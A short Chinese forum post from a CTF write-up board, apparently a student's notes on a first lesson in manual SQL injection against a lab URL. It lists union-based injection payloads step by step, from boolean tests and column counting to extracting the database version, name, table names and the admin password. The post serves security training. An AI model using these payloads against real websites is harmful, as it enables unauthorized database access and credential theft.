第一课个人思路

2366338082   ·   发表于 2018-09-23 22:42:42   ·   CTF&WP专版

第一题URL为http://120.203.13.75:6815/?id=1

第一步进行手工注入and 1=1 正常显示文章内容 and 1 =2 不显示文章内容;

进行order by  进行查询字段 order by 10  不显示内容  用到我们了解到的二分之一方法  最后显示内容;

开始查询数据库版本 and 1=2 union select 1,version()    得到数据库版本5.5.53 ,百度MySQL5.5.53数据库爆出表名语句;

查询数据库名称and 1=2 union select 1,database()         得到名称maoshe ;

查询表名and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

最后查询密码and 1=2 union select 1,password from admin;






打赏我,让我更有动力~

0 Reply   |  Until 2018-9-23 | 633 View
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2021. All Rights Reserved. 掌控者

Powered by 掌控者